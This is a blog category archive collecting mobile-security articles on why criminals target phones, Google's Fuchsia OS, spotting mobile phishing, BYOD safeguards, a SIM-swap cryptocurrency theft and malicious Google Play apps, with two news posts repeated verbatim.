Category Archives: Mobile

All the reasons why cybercriminals want to hack your phone

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in US cellular exchange, the vulnerability known as SS7, which allows hackers to listen to calls, read texts, and see users’ locations after learning their phone numbers. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information from a victim that available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave into hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of the cryptomining malware called Loapi is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety is might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions. of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Mobile Menace Monday: Is Fuchsia OS the end of Android?

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with user interface, and it has the ability to scale up to larger devices like laptops and computers. Also, it can support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, it calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

Zircon

It all starts with Zircon(formerly Magenta), the Fuchsia Operating System’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon operates as a foundation on which the Fuchsia house foundation is built, and it primarily handles access to hardware and communication between software.

Garnet

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for Volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor,  modern editor with a backend written in Rust.

Peridot

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime app design for composition. What this means is almost everything that exists in Fuchsia, such as software and even system files, are in packages. And Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz

Topaz is the top layer and the one you’ll mostly likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development abilities for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Due to the Flutter software development kit offering cross-platform opportunities, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at https://flutter.io.

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zirkon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar with the code name Singularity, but they totally failed. That’s why there’s a big question mark if Fuchsia will actually replace Android and Chrome OS, or putter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

Android Malware Steals from PayPal Accounts

What happens when you combine a remotely controlled banking Trojan with an abuse of Android Accessibility services? According to new research from ESET, you get an Android Trojan that steals money from

The post Android Malware Steals from PayPal Accounts appeared first on The Cyber Security Place.

Something else is phishy: How to detect phishing attempts on mobile

In a report published in 2011, IBM revealed that mobile users are three times more likely to fall for phishing scams compared to desktop users. This claim was based on accessed log files found on Web servers used to host websites involved in phishing campaigns.

Almost a decade later, we continue to see different organizations reporting an increased trend in phishing attacks targeting the mobile market. Surprisingly, phishers seem to have tipped the scales to a new preferred target: iPhone users. Wandera, a mobile security solutions provider, has observed that iOS users experience twice as many phishing attacks compared to their Android counterparts.

Mobile phishing by the numbers

Below is a quick rundown of current noteworthy mobile phishing statistics to date:

  • In the whitepaper “Mobile phishing 2018: Myths and facts facing every modern enterprise today” (PDF), Lookout has determined that the rate at which users are tapping phishing links has grown an average of 85% since 2011.
  • In the latest “Phishing Activity Trend Report” (PDF), the Anti-Phishing Working Group (APWG) has revealed that the Payments industry continues to rank as the top targeted sector by phishing threat actors (36%) in Q1 2018.
  • This same APWG report also claims that 35% of all phishing sites were using HTTPS and SSL certificates.

    With Google now labeling non-HTTPS website as “Non-Secure,” expect to see more phishers abuse the accepted concept that HTTPS sites are trustworthy and legitimate.

  • In their report, “2018 State of Phish”, Wombat Security hailed smishing, short for SMS phishing, as the attack vector to watch. This is due to its increased media reporting in 2017, which they believe will continue to trend, especially in countries with low awareness of mobile phishing.
  • PhishLabs stated in its “2018 Phishing Trends & Intelligence Report” (PDF) that Email/Online Services is the top targeted industry in the second half of 2017 (26.1%), with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages. This suggests that there is an increasing trend of phishing campaigns targeting businesses.
  • This same PhishLabs report has also noted a dramatic increase of phishing campaigns banking on the trust of users towards software-as-a-service (SaaS) companies (7.1%). Such attacks are said to be non-existent before 2015 but have more than doubled in two succeeding years.
  • Wandera stated that 48% of phishing attacks happen on mobile. They also claim that iOS users are 18X more likely to fall for a phish than to download malware.

Mobile phishing scam types

Phishing attacks are no longer exclusive to emails, especially on mobile. A mobile device’s inherent design and features have made it possible for phishers to create ways on how they can get into users’ heads and get their hands on vital personal and business data.

While many users are quite familiar with what phishing looks like on the desktop, these same users are not as familiar with smishing or vishing—and other types of phish one might encounter on the mobile—as they are with email phishing.

SMiShing

SMiShing is phishing done through SMS. Android expert and Senior Analyst Nathan Collier has written about a smishing message a colleague received on their Android device that purportedly originating from a human resources company, promoting an open albeit fake position of Prime Agent for Amazon.

iOS users also have their share of spotted smishing campaigns. Below is a smishing message posted publicly on Reddit as a warning to other iPhone users:

Screenshot of an iOS SMS phishing message. Courtesy of Redditor u/jamesmt87.

Your Apple ID has been disabled until we hear from you ,
Prevent this by confirming your informations at {bit.ly URL}
Apple inc

Vishing

Vishing, or voice-mail phishing (at times, it also stands for VoIP phishing), is phishing done with the use of a device’s call feature. An attempt can be considered vishing if the potential phisher (1) leaves a recorded message to the target that something is wrong, (2) leaves a number that the target can use to call back, or (3) cold calls the target. Point two is precisely the tactic used by an iOS phishing scam that Ars Technica Editor Sean Gallagher revealed in a July 2018 post. According to Gallagher, an email directs users to a fake Apple website, which pops up a dialog box to start a call to a purported agent that goes by “Lance Roger at AppleCare.” AppleCare is Apple’s extended warranty service.

A vishing pop-up dialog box. Courtesy of Ars Technica.

In Android’s corner, we have the latest variant of Fakebank, a mobile Trojan that is capable of intercepting bank SMS and inbound and outgoing calls. A user, for example, making a call to a legitimate bank gets redirected to scammers who are posing as agents working for the bank. Security researchers have spotted this variant in affected apps geared towards Korean bank clients.

Vishing can also be a part of a greater business email compromise (BEC) attack.

Other types: messenger phishing, social phishing, and ad-network phishing

Apps continue to shape a user’s mobile experience for the better. Without them, one may likely just consider their phones as a pricey paperweight.

These brilliant little programs have made it possible for users to both access their personal and work emails while away from a desktop computer, keep in touch with family and friends via messaging platforms while on the go, share and access media in real-time, and stave off boredom while waiting.

Phishers, unfortunately, have leveraged the power of apps to their advantage. And the internet is rife with stories of people who got (or nearly got) phished via mobile apps.

Take, for instance, the Facebook message that used Messenger as a launchpad to spread a purported “viral video” of the recipient complete with their picture and name, and a number indicating the view count.

Screenshot of a Facebook Messenger phish. Courtesy of Security For Real People.

Clicking this “video” sent mobile users to a fake Facebook Videos login screen, wherein they were then encouraged to key in their Facebook credentials. Doing so sent a similar video bait to contacts, not to mention scammers hijacking the accounts of those who fell for this trick.

This is a case of messenger phishing. It is a type of phishing attempt that uses messaging services on mobile devices. Examples of these services are WhatsApp, Instagram, Viber, Skype, Snapchat, and Slack.

Then there’s social phishing, which is an attempt that abuses social networking sites to spread a phishing campaign. Below is a capture of a phishing message sent to a recipient via LinkedIn’s InMail feature:

Screenshot of a LinkedIn InMail phish. Courtesy of KnowBe4.

Here’s another case of social phishing: A Twitter account posing as NatWest bank inserted itself into a live conversation between a NatWest bank client and NatWest’s official Twitter channel in an attempt to present a bogus quick fix to the current concern the real bank was attempting to address.

Malwarebytes has caught a fake NatWest Twitter account red-handed.

Finally, ad-network phishing. On mobile, ads can come in many forms: They can be in free apps, on web pages the user visits, and as a pop-up notification or banner. Because apps communicate with other services (like an ad network) at the background, they can potentially expose mobile users to risks like a phishing campaign (at best) or malware (at worst).

We’d be remiss if we don’t mention phishing apps. These are fake apps that bank on the names of popular online brands, usually promising one or more perks if downloaded and installed. Such is the case of multiple fake Instagram apps that were pulled from the Google Play store after being found to collect credentials. These apps have been downloaded 1.5 million times, and they promise to boost follower count, post likes, and comments.

Mobile phish spotting

Mobile phishing attempts are quite a challenge to detect, more so for the uninitiated and the unacquainted. Regardless of your level of know-how or your computing platform of choice, as a rule of thumb, it is always best to familiarize yourself with common phishing tactics and trends. We already have a great and very comprehensive list of red flags that can guide you in determining phishing attempts in general. However, mobile users can significantly benefit from our listing of tell-tale signs of potential mobile phishing attempts (below) just as well:

  • The message comes out of the blue, claiming that you either (1) won a prize, (2) have an account or subscribed service suddenly deactivated (often without disclosing a reason), or (3) there is a very urgent need for you to do something to address a problem. Such claims are tried-and-tested social engineering ploys that more often than not give the game away.

    When it comes to being truly notified for actual breaches and that steps must be taken to mitigate its effects, however, it is best for users to avoid clicking links in these notifications (which we agree is faster and more convenient) in favor of going directly to the legitimate domain (either by loading it from bookmark or manually typing in the address in the address bar) and logging in from there.

  • The message comes from an unknown number or sender. And if it claims to be from a service you actually use, be doubly cautious. As it’s near impossible to determine on mobile if the service provider is who they say they really are, you might be better off verifying any claims for yourself, just like in the above point, and checking for logged suspicious activities. If you’re still a bit bothered, contact your service provider’s customer support department.
  • The message comes with a bogus hyperlink, which may be obvious to some but not to others. It pays to be very familiar with URLs of official web addresses of services you use online. If you feel or think that something is off, even if you’re unsure what is triggering this, err on the side of caution and avoid clicking that link.
  • The message comes with a shortened URL. Shortening URLs is an excellent method to make effective use of space that has a limited character count. Unfortunately, this can be abused to mask potentially malicious URLs from being detected at first glance.
  • If the message or caller asks for personal information, if not more information, from you. A majority of legitimate and reputable businesses don’t call or send messages asking for sensitive information. In some cases, banks do call if they suspect potential fraud activity with your account. They do this to check that you are who you say you are. However, there are certain information they will never ask you to divulge, such as your account PIN or Social Security Number (SSN).
  • If the message or caller doesn’t address you by your name. Again, a majority of businesses know who their clients are and will always address you by your name.
  • If the URL you get directed to doesn’t have a green padlock. Yes, having HTTPS on a website is no longer a solid proof that one is not on a malicious page, but there are still a lot of phishing campaigns out there that forgo using HTTPS.
  • If the URL you get redirected to appears to be right, but also has unexplained dashes after it. Phishers are already using a technique called URL padding, wherein they pad the subdomain, which consists of a legitimate website address, with hyphens to hide the real domain and create believability.

    Screenshot of a fake Facebook login screen where phishers used URL padding. Courtesy of PhishLabs.

    In this example, the complete URL is hxxp://m.facebook.com----------------validate----step1.rickytaylk[dot]com/sign_in.html, where rickytaylk[dot]com is the domain and m.facebook.com----------------validate----step1 is the long subdomain. Users would likely find it difficult to view the complete URL given the mobile’s small screen size, but what they can do is copy the URL and paste it on a notepad app. From there, users can scrutinize the URL more effectively.

A word on homograph attacks: Yes, they work on mobile devices, too. Fortunately, many of modern internet browsers are already programmed to display the Punycode version of domains that contain confusables (or non-English characters that visually appear similar to one or more English alphabets).

Users seeing a Punycode URL on their mobile browser could be alerted that they’re on a page they’re not supposed to be on. And this is a good thing. However, not all apps that accept and display text have considered the possibility of homograph attacks. According to Wandera’s research, many communications and collaboration tools used by employees on both Android and iOS don’t flag Punycode URLs as suspicious.

“Only Facebook Messenger, Instagram and Skype provided an opportunity for the user to identify the punycode URL by either showing a preview of the webpage with the xn prefix, or, in the case of skype, by not providing a hyperlink for domains using unicode, meaning users can’t click through from the message.” writes Liarna La Porta, Content Marketing Manager for Wandera, in a blog post. “While these apps are not providing the best methods of defense, they at least provide an opportunity to asses suspicious links more closely.”

Phish-proof no more?

In April of 2017, a Lithuanian man who posed as Quanta Computer, a Taiwanese electronics manufacturing company, successfully conned two big names in the tech industry, each paying him over $100M. These companies eventually got the bulk of their money back, but not after making headlines that made readers gasp. Who were these phishing victims? They’re Google and Facebook.

When it comes to a target’s low potentiality to fall for a phishing lure, it appears that tech savviness is slowly becoming a non-factor. It is challenging enough for desktop users to successfully determine a believable phish. With mobile devices, which already have a size limitation and more potential attack points, users are doubly challenged, especially if the adversary is motivated enough to steal the sensitive corporate data stored in them.

Indeed, phishing has branched beyond email. And using commodity-level phishing protection on mobile is inadequate in defending users from attacks. Being truly phish-proof (or akin to it) may require necessary adjustments on the side of both man and machine: improved security features on mobile devices and their apps, and knowing the red flags and what steps to take to adequately respond to a phishing attempt are key.

Recommended reading:

  • “Phishing attacks on modern Android” (direct PDF link here)
  • “Social Phishing” (direct PDF link here)

 

The post Something else is phishy: How to detect phishing attempts on mobile appeared first on Malwarebytes Labs.

Top Ten Tips for Securing Your Mobile Devices

Do you have employees who bring mobile phones to work and use those devices on the corporate network? Do they store company data on these “Bring Your Own Devices (BYOD)”?? Does your company have a policy in place for this?

First, the moment a person brings in their personal phone to work, there is a fusion of personal and business tasks that occur. And, equally as bad, company issued devices are used for personal use as much, if not more than the employees own devices. Not sure you believe this? Here are some stats:

A recent survey asked 2,000 office workers about their habit of using their personal mobile devices at work. Here’s what it found:

  • 73% of people admit to downloading personal apps to tablets they got from their company.
  • 62% of people admit to downloading personal apps to mobile phones they got from their company.
  • 45% of people admit to downloading personal apps to notebooks they got from their company.
  • The people who were most likely to do this were in the 25 to 38-year-old age group.
  • 90% of people use their personal mobile devices to conduct business for work.

As you can see, a lot of people are using their mobile devices on the job, and this could not only put your company data at risk, but also the data associated with your clients. Do you have a plan to minimize or even totally prevent how much sensitive company data is wide open to hackers?

Solutions to Keep Sensitive Business Information Safe

Decision makers and business owners should always consider their personal devices as equal to any business device. You definitely don’t want your sensitive company information out there, and this information is often contained on your personal mobile or laptop device. Here are some things that you can do to keep this information safe:

Give Your Staff Information About Phishing Scams

Phishing is a method that cybercriminals use to steal data from companies. Studies show that it is extremely easy for even the smartest employees to fall for these tricks. Here’s how they work: a staff member gets an email with a sense of urgency. Inside the email is a link. The body of the email encourages the reader to click the link. When they do, they are taken to a website that either installs a virus onto the network or tricks the employee into giving out important company information.

Inform Your Staff that the Bad Guys Might Pose as Someone They Know

Even if you tell your staff about phishing, they can still get tricked into clicking an email link. How? Because the bad guys make these emails really convincing. Hackers do their research, and they are often skilled in the principles of influence and the psychology of persuasion. So, they can easily create fake emails that look like they come from your CEO or a vendor, someone your staff trusts. With this in mind, it might be best to create a policy where employees are no longer allowed to click email links. Pick up the phone to confirm that whatever an email is requesting, that the person who sent it is legitimate.

Teach Employees that Freebies aren’t Always Goodies

A lot of hackers use the promise of something free to get clicks. Make sure your staff knows to never click on an email link promising a freebie of any kind.

Don’t Buy Apps from Third-Party Sources

Apps are quite popular, and there are many that can help to boost productivity in a business setting. However, Apple devices that are “jailbroken” or Android devices that are “rooted” are outside of the walled garden of their respective stores and susceptible to malicious viruses. Make sure your employees know that they should never buy an app from a third-party source. Only use the official Apple App Store or the Google Play Store.

Always Protect Devices

It’s also important that you advise your employees to keep their devices protected with a password. These devices are easy to steal since they are so small. If there is no password, there is nothing stopping a bad guy from getting into them and accessing all of the accounts that are currently logged into the device.

Install a Wipe Function on All Mobile Devices Used for Business

You should also require all employees to have a “wipe” function on their phones. Even if they are only doing something simple, like checking their work email on their personal mobile device, it could get into the wrong hands. With the “wipe” function, the entire phone can be cleared remotely. You should also require employees to use the setting that erases the phone after a set number of password attempts.

Require that All Mobile Devices on the Company Network Use Anti-Virus Software

It’s also important, especially in the case of Android devices, that all mobile devices on the network have some type of anti-virus software.

Do Not Allow Any Jailbroken Devices on Your Company’s Network

Jailbroken devices are much more vulnerable to viruses and other malware. So, never allow an employee with a jailbroken phone to connect to your network.

All Employees Should Activate Update Alerts

One of the easiest ways to keep mobile devices safe is to keep them updated. So, make sure that all employees have update alerts enabled, and make sure that they are updating their devices when prompted or automatically.

Teach Employees About the Dangers of Public Wi-Fi

Finally, make sure your staff knows the dangers of using public Wi-Fi. Public Wi-Fi connections are not secure, so when connected, your devices are pretty open. That means, if you are doing things that are sensitive, such as logging into company accounting records, a hacker can easily follow. Instead, urge employees to use a VPN. These services are inexpensive and they encrypt data so hackers can’t access it.

He is the founder of Safr.me a cybersecurity speaking and consulting firm based in Massachussets. http://www.safr.me

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of Safr.me a cybersecurity speaking and consulting firm based in Massachussets. See him discussing internet and wireless security on Good Morning America.

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



Security Affairs

Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.

Security Affairs: 13 fraudulent apps into Google Play have been downloaded 560,000+ times

Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps into Google Play that have been already downloaded and installed over half a million times (+560,000).

Google Play Malicious apps

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps are posing as games were published by the same developer named Luis O Pinto, at the time they have a low detection rate.

The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps would remove their icon from the display immediately and downloads other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center, once installed and executed it hides itself start displaying ads.

The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.



Security Affairs

13 fraudulent apps into Google Play have been downloaded 560,000+ times

Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps into Google Play that have been already downloaded and installed over half a million times (+560,000).

Google Play Malicious apps

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps are posing as games were published by the same developer named Luis O Pinto, at the time they have a low detection rate.

The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps would remove their icon from the display immediately and downloads other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center, once installed and executed it hides itself start displaying ads.

The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

